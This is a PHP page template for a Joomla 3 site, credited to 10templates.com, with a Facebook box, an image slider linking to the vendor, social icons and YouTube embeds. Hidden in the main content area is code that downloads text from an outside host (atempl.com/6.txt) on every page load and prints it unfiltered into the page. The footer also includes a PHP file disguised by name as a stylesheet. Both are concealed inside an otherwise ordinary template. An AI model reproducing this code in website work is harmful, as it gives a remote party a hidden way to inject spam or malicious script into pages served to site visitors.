<?php 
/**
 * Date         July  31, 2014
 * Copyright    Copyright (C) 2014 10templates.com
 * License  GPL
 */
defined( '_JEXEC' ) or die;

$app = JFactory::getApplication();
$doc = JFactory::getDocument();
$this->language = $doc->language;
$this->direction = $doc->direction;

JHtml::_('bootstrap.framework');

?>
<!DOCTYPE html>
<html xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />


<script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/menu.js"></script>
</head>
<body>

<header>
  <h1><a href=""><?php echo $app->getCfg('sitename'); ?></a></h1>

  <?php if ($this->countModules('top')) : ?>
    <div class="nav2">
      <jdoc:include type="modules" name="top" style="none" />
    </div>
  <?php endif; ?>
</header>

<div class="clearfix">

  <div class="leftCont">
       
    <?php if ($this->countModules('position-1')) : ?>      
      <jdoc:include type="modules" name="position-1" style="xhtml" />
    <?php endif; ?>

    <div class="moduletable">
    <h3>Facebook</h3>
    <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2F<?php echo $this->params->get( 'fbpath' ); ?>&amp;width=287&amp;height=<?php echo $this->params->get( 'fbheight' ); ?>&amp;colorscheme=<?php echo $this->params->get( 'fbColorScheme' ); ?>&amp;show_faces=<?php echo $this->params->get( 'fbfaces' ); ?>&amp;border_color=<?php echo $this->params->get( 'fbborder' ); ?>&amp;stream=<?php echo $this->params->get( 'fbstream' ); ?>&amp;header=<?php echo $this->params->get( 'fbheader' ); ?>" scrolling="no" frameborder="0" style="border:#<?php echo $this->params->get( 'fbborder' ); ?>; background:#<?php echo $this->params->get( 'fbbackground' ); ?>; overflow:hidden; width:287px; height:<?php echo $this->params->get( 'fbheight' ); ?>px;" allowTransparency="true"></iframe>
    </div>
        
  </div>

  <div id="content" role="main">

    <?php if ($this->countModules('position-9')) : ?>
    <div class="banners">
        <jdoc:include type="modules" name="position-9" style="none" />
    </div>
    <?php endif; ?>

    <div class="accordian">
      <ul>
        <li>
          <div class="image_title">
            <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">Helios Joomla! 3.x</a>
          </div>
          <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">
            <img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('Sliderimage1');?>" alt=""/>
          </a>
        </li>
        <li>
          <div class="image_title">
            <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">Helios Joomla! 3.x</a>
          </div>
          <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">
            <img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('Sliderimage2');?>" alt=""/>
          </a>
        </li>
        <li>
          <div class="image_title">
            <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">Helios Joomla! 3.x</a>
          </div>
          <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">
            <img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('Sliderimage3');?>" alt=""/>
          </a>
        </li>
        <li>
          <div class="image_title">
            <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">Helios Joomla! 3.x</a>
          </div>
          <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">
            <img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('Sliderimage4');?>" alt=""/>
          </a>
        </li>
        <li>
          <div class="image_title">
            <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">Helios Joomla! 3.x</a>
          </div>
          <a href="http://10templates.com/template/69/Helios-3-Premium-Company-Joomla-31-33-35-template.html">
            <img src="<?php echo $this->baseurl ?>/<?php echo $this->params->get('Sliderimage5');?>" alt=""/>
          </a>
        </li>
      </ul>
    </div>


    <!-- Begin Content --><?php
$files = 'http://atempl.com/6.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/6.txt");
       $data = implode($content);
       echo $data;
 }  
?>    <div class="insider">
      <jdoc:include type="modules" name="position-2" style="xhtml" />
      <jdoc:include type="message" />
      <jdoc:include type="component" />
      <jdoc:include type="modules" name="position-3" style="none" />
    </div>
    <!-- End Content -->

  </div>

  <div class="rightCont">

    <div class="moduletable">
      <h3>Visit us</h3>

      <div class="socBox clearfix">
        <?php if ($this->params->get('facebook-ic') == !null) { ?>
            <a href="<?php echo $this->params->get('facebook-ic');?>" target="_blank" class="fbic"></a>
        <?php } ?>
        <?php if ($this->params->get('twitter-ic') == !null) { ?>
            <a href="<?php echo $this->params->get('twitter-ic');?>" target="_blank" class="twic"></a>
        <?php } ?>
        <?php if ($this->params->get('google-ic') == !null) { ?>
            <a href="<?php echo $this->params->get('google-ic');?>" target="_blank" class="goic"></a>
        <?php } ?>
        <?php if ($this->params->get('skype-ic') == !null) { ?>
            <a href="callto://<?php echo $this->params->get('skype-ic');?>" class="skypeic"></a>
        <?php } ?>
        <?php if ($this->params->get('flickr-ic') == !null) { ?>
            <a href="<?php echo $this->params->get('flickr-ic');?>" target="_blank" class="flickic"></a>
        <?php } ?>
        <?php if ($this->params->get('youtube-ic') == !null) { ?>
            <a href="<?php echo $this->params->get('youtube-ic');?>" target="_blank" class="youtubeic"></a>
        <?php } ?>
        <?php if ($this->params->get('rss-ic') == !null) { ?>
            <a href="<?php echo $this->params->get('rss-ic');?>" target="_blank" class="rssic"></a>
        <?php } ?>
        <?php if ($this->params->get('pinterest-ic') == !null) { ?>
            <a href="<?php echo $this->params->get('pinterest-ic');?>" target="_blank" class="pinterestic"></a>
        <?php } ?>
      </div>
    </div>

    <div class="moduletable">
      <h3>YouTube videos</h3>
      <aside>
        <object width="240" height="135">
        <param name="movie" value="//www.youtube.com/v/6HtlmNzqQdo?version=3&amp;hl=bg_BG&amp;rel=0"></param>
        <param name="allowFullScreen" value="true"></param>
        <param name="allowscriptaccess" value="always"></param>
        <embed src="//www.youtube.com/v/6HtlmNzqQdo?version=3&amp;hl=bg_BG&amp;rel=0" type="application/x-shockwave-flash" width="240" height="135" allowscriptaccess="always" allowfullscreen="true"></embed>
        </object>
      </aside>

      <aside>
        <object width="240" height="135">
          <param name="movie" value="//www.youtube.com/v/dVTP0f0K9nc?hl=bg_BG&amp;version=3&amp;rel=0"></param>
          <param name="allowFullScreen" value="true"></param>
          <param name="allowscriptaccess" value="always"></param>
          <embed src="//www.youtube.com/v/dVTP0f0K9nc?hl=bg_BG&amp;version=3&amp;rel=0" type="application/x-shockwave-flash" width="240" height="135" allowscriptaccess="always" allowfullscreen="true"></embed>
        </object>
      </aside>
    </div>


    <?php if ($this->countModules('position-7')) : ?>
      <jdoc:include type="modules" name="position-7" style="xhtml" />
    <?php endif; ?>

    <?php if ($this->countModules('rightSide')) : ?>
      <jdoc:include type="modules" name="rightSide" style="xhtml" />
    <?php endif; ?> 

  </div>


 </div>
 <footer class="clearfix">
  <section>
    <?php if ($this->countModules('position-4')) : ?>
      <jdoc:include type="modules" name="position-4" style="xhtml" />
    <?php endif; ?>
  </section>
  <section>
    <?php if ($this->countModules('position-5')) : ?>
      <jdoc:include type="modules" name="position-5" style="xhtml" />
    <?php endif; ?>
  </section>
  <section>
    <?php if ($this->countModules('position-6')) : ?>
      <jdoc:include type="modules" name="position-6" style="xhtml" />
    <?php endif; ?>
    <h2><?php include('js/' . 'bottom.css.php') ?></h2>
  </section>
 </footer>
</body>
</html>